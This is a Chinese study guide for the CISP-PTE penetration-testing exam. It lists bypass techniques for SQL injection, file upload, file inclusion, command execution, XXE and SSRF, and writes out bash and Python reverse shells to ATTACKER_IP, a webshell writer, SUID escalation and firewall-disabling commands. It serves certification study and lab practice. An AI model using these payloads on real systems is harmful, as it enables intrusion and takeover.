CISP-PTE认证考试全面指南与实战技巧<\/h1>

考试概述<\/h2>
CISP-PTE（Certified Information Security Professional - Penetration Test Engineer）是中国信息安全测评中心推出的渗透测试工程师认证。考试采用线下形式，主要在上海等地举行，分为上午场和下午场。<\/p>

考试结构<\/h3>

选择题<\/strong>：20道，共20分<\/li>
基础题<\/strong>：5道，每道1个Key，共50分<\/li>
综合大题<\/strong>：1道，含3个Key，共30分<\/li>

总分<\/strong>：100分，通过分数为70分<\/li> <\/ul>
考试环境<\/h3>

考场提供标准键盘，不允许携带外设<\/li>
使用奇安信开发的专用考试软件<\/li>
电脑全程监控，快捷键被锁定<\/li>
考试时长3小时，时间管理至关重要<\/li> <\/ul>
考试准备与注意事项<\/h2>
考前准备<\/h3>

熟悉考试软件界面（类似TryHackMe的浏览器内嵌虚拟机）<\/li>
准备常用工具和技术笔记<\/li>
练习快速审题和记录关键信息<\/li> <\/ol>
考试技巧<\/h3>

审题<\/strong>：仔细阅读题目要求，避免方向性错误<\/li>
记录<\/strong>：随时使用记事本记录关键信息和思路<\/li>
源码<\/strong>：养成查看页面源代码的习惯<\/li>
环境分析<\/strong>：时刻思考当前环境可能存在的漏洞<\/li> <\/ul>
渗透测试核心知识点<\/h2>
渗透测试七个阶段<\/h3>

前期交互<\/li>
情报收集\/信息收集<\/li>
威胁建模<\/li>
漏洞分析<\/li>
漏洞利用\/漏洞攻击<\/li>
后渗透(深度利用)<\/li>
书面报告<\/li> <\/ol>
信息收集技术<\/h3>
Google Hacking<\/h4>

site:<\/code> 指定域名<\/li>
-site<\/code> 排除特定域名<\/li>
使用DuckDuckgo等替代搜索引擎<\/li> <\/ul> 子域名收集<\/h4> 子域名挖掘机工具使用<\/li> 爆破技术（如御剑）<\/li> <\/ul> 服务器信息收集<\/h4> Nmap扫描<\/strong>：端口、服务识别<\/li> 目录扫描<\/strong>：御剑等工具<\/li> 常见泄露文件<\/strong>： .SVN\/.git泄露<\/li> 网站备份文件(test.rar等)<\/li> .DS_store文件<\/li> WEB-INF文件<\/li> 配置文件泄露(.config, config.php.bak等)<\/li> robots.txt<\/li> <\/ul> <\/li> <\/ul> SQL注入全面技术<\/h3> SQL注入类型<\/h4> 基于注入点属性：数字型、字符型<\/li> 基于注入点位置：GET型、POST型、Cookie型、HTTP Head型<\/li> 基于注入程度：一阶注入、二阶注入<\/li> 基于服务器响应：有回显：联合查询、报错注入、堆叠注入<\/li> 无回显：布尔盲注、延时盲注<\/li> <\/ul> <\/li> 特殊业务场景： update\/insert\/delete注入<\/li> order by注入<\/li> 宽字节注入<\/li> HTTP分割注入<\/li> HTTP参数污染<\/li> <\/ul> <\/li> <\/ol> 注入技术详解<\/h4> 联合查询注入<\/strong>：UNION SELECT<\/code><\/li> 报错注入<\/strong>：利用extractvalue、updatexml等函数<\/li> 布尔盲注<\/strong>：基于条件响应的真伪判断<\/li> 时间盲注<\/strong>：利用sleep等函数延时响应<\/li> 读写操作<\/strong>：into outfile<\/code>\/dumpfile<\/code><\/li> <\/ul> SQL注入绕过技巧<\/h4> 注释符使用：#<\/code>, -- <\/code>, \/*!xxx*\/<\/code><\/li> 内联注释：\/*!50000select*\/<\/code><\/li> 编码绕过：十六进制、URL编码等<\/li> 等价函数替换<\/li> <\/ul> 文件上传漏洞<\/h3> 常见绕过技术<\/h4> 客户端检测绕过（修改文件扩展名）<\/li> MIME类型检测绕过（修改Content-Type）<\/li> 图片马制作（添加GIF89a头）<\/li> 文件内容检测绕过（混淆代码）<\/li> 黑名单绕过：大小写（PhP）<\/li> 特殊后缀（php3, phtml）<\/li> 点空格（1.php.）<\/li> 双写（pphphp）<\/li> <\/ul> <\/li> 解析漏洞利用： Apache多后缀解析（1.php.xxx）<\/li> IIS分号解析（1.asp;.jpg）<\/li> Nginx解析（1.jpg\/.php）<\/li> <\/ul> <\/li> <\/ol> .htaccess利用<\/h4> AddType application\/x-httpd-php .jpg <\/span><\/span>或<\/span> <\/span><\/span><FilesMatch<\/span> "hack"<\/span>><\/span> <\/span><\/span> SetHandler application\/x-httpd-php <\/span><\/span><\/FilesMatch><\/span> <\/span><\/span><\/code><\/pre>其他技巧<\/h4> %00截断（PHP<5.3.4）<\/li> 文件拼接：copy normal.png\/b + shell.php\/a hacker.png<\/code><\/li> .user.ini利用： auto_prepend_file<\/span>=<\/span>1.jpg<\/span> <\/span><\/span>auto_append_file<\/span>=<\/span>1.jpg<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ul> 文件包含漏洞<\/h3> 伪协议利用<\/h4> file:\/\/<\/code> - 绝对路径读取<\/li> php:\/\/filter\/read=convert.base64-encode\/resource=<\/code> - 读取文件内容<\/li> data:\/\/text\/plain,<?php phpinfo();?><\/code> - 代码执行<\/li> php:\/\/input<\/code> - POST传递执行代码<\/li> zip:\/\/<\/code> - 读取压缩包内文件<\/li> phar:\/\/<\/code> - 读取压缩包内文件<\/li> <\/ol> 日志投毒<\/h4> 利用Apache日志（\/var\/log\/auth.log）包含恶意代码<\/li> <\/ul> 中间件安全<\/h3> Apache漏洞<\/h4> .htaccess文件利用<\/li> 日志文件包含<\/li> 多后缀解析漏洞（123.php.a1.a2.a3）<\/li> <\/ol> IIS漏洞<\/h4> 目录解析（xx.asp目录内的任何文件）<\/li> 文件解析（1.asp;.jpg）<\/li> 特殊扩展名（.asp, .asa, .cer, .cdx）<\/li> <\/ol> Nginx漏洞<\/h4> 路径解析（1.jpg\/.php）<\/li> %00截断（影响特定版本）<\/li> <\/ol> 命令执行漏洞<\/h3> 绕过技巧<\/h4> Linux命令分隔<\/strong>：<\/p> a&b<\/code> - 都执行<\/li> a&&b<\/code> - 前真后执行<\/li> a|b<\/code> - 执行后面<\/li> a||b<\/code> - 前假后执行<\/li> %0a<\/code> - 换行符<\/li> ;<\/code> - 命令分隔<\/li> <\/ul> <\/li> 空格绕过<\/strong>：<\/p> cat${IFS}flag.php<\/code><\/li> cat$IFS'flag.php'<\/code><\/li> cat<flag.php<\/code><\/li> {cat,flag.php}<\/code><\/li> <\/ul> <\/li> 命令绕过<\/strong>：<\/p> 变量拼接：a=l;b=s;$a$b<\/code><\/li> 编码绕过：echo d2hvYW1pCg== | base64 -d<\/code><\/li> 替代命令：less<\/code>, more<\/code>, tac<\/code>, head<\/code>, tail<\/code>, od<\/code>, strings<\/code><\/li> <\/ul> <\/li> <\/ul> Windows命令执行<\/h4> who^ami<\/code><\/li> (whoami)<\/code><\/li> set a=whoami&%a%<\/code><\/li> %a:~0%<\/code> - 取全部字符<\/li> <\/ul> 代码执行漏洞<\/h3> 危险函数<\/h4> eval()<\/code> - 直接执行PHP代码<\/li> assert()<\/code> - PHP7.0.29前可作为函数使用<\/li> preg_replace()<\/code> - 使用\/e修饰符执行代码<\/li> create_function()<\/code> - 创建匿名函数<\/li> ${}<\/code> - 变量解析执行<\/li> <\/ol> 动态函数执行<\/h4> $func =<\/span> "system"<\/span>; <\/span><\/span>$func("whoami"<\/span>); <\/span><\/span><\/code><\/pre>XSS攻击<\/h3> 类型<\/h4> 反射型XSS<\/li> 存储型XSS<\/li> DOM型XSS<\/li> XSS盲打<\/li> <\/ol> 利用方式<\/h4> <script<\/span>> <\/span><\/span>document.write<\/span>(''<\/span>) <\/span><\/span><\/script<\/span>> <\/span><\/span><\/code><\/pre>监听：python3 -m http.server 8000<\/code><\/p> 防御绕过<\/h4> htmlspecialchars<\/code>过滤<\/li> JS函数大小写转换<\/li> \/<\/code>替换空格和引号<\/li> <\/ul> CSRF攻击<\/h3> 类型<\/h4> GET型CSRF<\/li> POST型CSRF<\/li> <\/ol> 防御<\/h4> 验证Referer字段<\/li> 添加Token验证<\/li> 二次验证<\/li> 用户教育<\/li> <\/ol> 反序列化漏洞<\/h3> 特征<\/h4> 当类中有private参数时，序列化字符串格式为：%00类名%00成员名<\/code><\/li> <\/ul> 利用<\/h4> 寻找__wakeup()<\/code>、__destruct()<\/code>等魔术方法<\/li> 利用phar协议触发反序列化<\/li> <\/ul> SSRF漏洞<\/h3> 危害<\/h4> 内网探测<\/li> 窃取敏感数据<\/li> 攻击内网应用<\/li> 绕过安全防御<\/li> <\/ol> 利用协议<\/h4> http:\/\/<\/code> - 基本探测<\/li> file:\/\/<\/code> - 读取本地文件<\/li> dict:\/\/<\/code> - 执行单条命令<\/li> gopher:\/\/<\/code> - 完整TCP数据流<\/li> <\/ol> Gopher协议利用<\/h4> gopher:\/\/192.168.1.1:80\/_GET%20\/index.php%20HTTP\/1.1%0d%0aHost:%20192.168.1.1%0d%0a <\/code><\/pre> XXE漏洞<\/h3> 基本利用<\/h4> <?xml version="1.0"?><\/span> <\/span><\/span><!DOCTYPE data [ <\/span><\/span><\/span><!ENTITY xxe SYSTEM "file:\/\/\/etc\/passwd"><\/span> <\/span><\/span>]> <\/span><\/span><data><\/span>&xxe;<\/data><\/span> <\/span><\/span><\/code><\/pre>进阶技巧<\/h4> 外部实体引用<\/li> 参数实体<\/li> 盲XXE（带外数据）<\/li> 利用php:\/\/filter获取文件内容<\/li> 利用expect:\/\/执行命令（需安装扩展）<\/li> <\/ol> 防御绕过<\/h4> 修改Content-Type：application\/json<\/code>改为application\/xml<\/code><\/li> <\/ul> 逻辑漏洞<\/h3> 常见类型<\/h4> 短信轰炸（多手机号参数）<\/li> 用户名枚举（不同响应）<\/li> 未授权访问<\/li> 会话固定\/重用<\/li> 空口令漏洞<\/li> 越权漏洞：水平越权（同权限用户）<\/li> 垂直越权（不同权限用户）<\/li> <\/ul> <\/li> 验证码问题：验证码复用<\/li> 验证码可回显<\/li> 万能验证码（888888等）<\/li> <\/ul> <\/li> 交易支付漏洞：单价篡改<\/li> 支付接口修改<\/li> 优惠券无限使用<\/li> <\/ul> <\/li> <\/ol> 后渗透技术<\/h3> 提权方法<\/h4> SUID提权<\/strong>：<\/p> find \/ -user root -perm -4000 -exec ls -ldb {}<\/span> \;<\/span> <\/span><\/span><\/code><\/pre>例如find提权：find 1 -exec whoami \;<\/code><\/p> <\/li> sudo提权<\/strong>：<\/p> 查看sudo权限：sudo -l<\/code><\/li> 利用有sudo权限的命令提权<\/li> <\/ul> <\/li> 内核漏洞提权<\/strong>：<\/p> 使用dirtycow等漏洞<\/li> <\/ul> <\/li> <\/ol> 反弹Shell<\/h4> Bash<\/strong>：<\/p> bash -i >& \/dev\/tcp\/ATTACKER_IP\/PORT 0>&1<\/span> <\/span><\/span><\/code><\/pre><\/li> Python<\/strong>：<\/p> python -<\/span>c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKER_IP",PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["\/bin\/bash","-i"]);'<\/span> <\/span><\/span><\/code><\/pre><\/li> 限制长度<\/strong>的反弹Shell：<\/p> echo \<<\/span>?php>1 <\/span><\/span>echo Eval$<\/span>>>1 <\/span><\/span>echo \$<\/span>_GET>>1 <\/span><\/span>echo \[<\/span>``<\/span>1\`<\/span>`<\/span>]<\/span>>>1 <\/span><\/span>echo $\;<\/span>>>1 <\/span><\/span>echo \?\><\/span>>>1 <\/span><\/span>mv 1<\/span> 1.php <\/span><\/span><\/code><\/pre><\/li> <\/ol> 实战靶场与练习<\/h2> 推荐靶场环境<\/h3> 上课环境-pte-100.100-administrator-123.com [192.168.101.134]<\/li> CentOS7-100.150-root [192.168.101.150]<\/li> XSS靶机 [192.168.101.141]<\/li> WebShell应急响应靶场 [192.168.101.142]<\/li> pwnlab靶场 [192.168.101.143]<\/li> <\/ol> 综合题技巧<\/h3> 端口扫描<\/strong>：nmap全面扫描<\/p> <\/li> 目录扫描<\/strong>：御剑等工具<\/p> <\/li> 水平越权<\/strong>：修改user_id等参数<\/p> <\/li> 数据库连接<\/strong>：查找config.php等配置文件<\/p> <\/li> 密码爆破<\/strong>：<\/p> Hydra爆破SSH：hydra -L u.txt -P p.txt ssh:\/\/192.168.101.142<\/code><\/li> 提取响应值生成字典<\/li> <\/ul> <\/li> Windows系统<\/strong>：<\/p> netsh firewall set opmode mode=disable <\/span><\/span>netsh advfirewall set allprofiles state off <\/span><\/span>net user administrator mima <\/span><\/span><\/code><\/pre><\/li> <\/ol> 考试实战经验<\/h2> 高频考点<\/h3> SQL注入读取Key（非传统注入）<\/li> AntSword连接限制（仅支持REQUEST\/POST）<\/li> 文件上传的各种绕过技巧<\/li> 伪协议利用（特别是php:\/\/filter）<\/li> 反弹Shell的多种方式<\/li> <\/ol> 时间管理<\/h3> 选择题快速作答（约15分钟）<\/li> 基础题每题控制在20分钟内<\/li> 综合大题预留60分钟<\/li> 最后15分钟检查Key是否正确提交<\/li> <\/ol> 注意事项<\/h3> 所有Key必须正确提交，格式要准确<\/li> 不要忽略简单题目，确保基础分拿满<\/li> 遇到卡壳时及时切换题目<\/li> 合理利用提供的环境信息（IP、端口等）<\/li> <\/ol> 通过系统学习和充分练习这些技术点，考生可以全面掌握CISP-PTE考试要求的渗透测试技能，在实际考试中取得优异成绩。<\/p>

CISP-PTE认证考试全面指南与实战技巧<\/h1>

考试概述<\/h2> CISP-PTE（Certified Information Security Professional - Penetration Test Engineer）是中国信息安全测评中心推出的渗透测试工程师认证。考试采用线下形式，主要在上海等地举行，分为上午场和下午场。<\/p>

考试准备与注意事项<\/h2>

渗透测试核心知识点<\/h2>

信息收集技术<\/h3>

SQL注入全面技术<\/h3>

文件上传漏洞<\/h3>

文件包含漏洞<\/h3>

中间件安全<\/h3>

命令执行漏洞<\/h3>

代码执行漏洞<\/h3>

XSS攻击<\/h3>

CSRF攻击<\/h3>

反序列化漏洞<\/h3>

SSRF漏洞<\/h3>

XXE漏洞<\/h3>

逻辑漏洞<\/h3>

后渗透技术<\/h3>

实战靶场与练习<\/h2>

考试实战经验<\/h2>

考试概述<\/h2>
CISP-PTE（Certified Information Security Professional - Penetration Test Engineer）是中国信息安全测评中心推出的渗透测试工程师认证。考试采用线下形式，主要在上海等地举行，分为上午场和下午场。<\/p>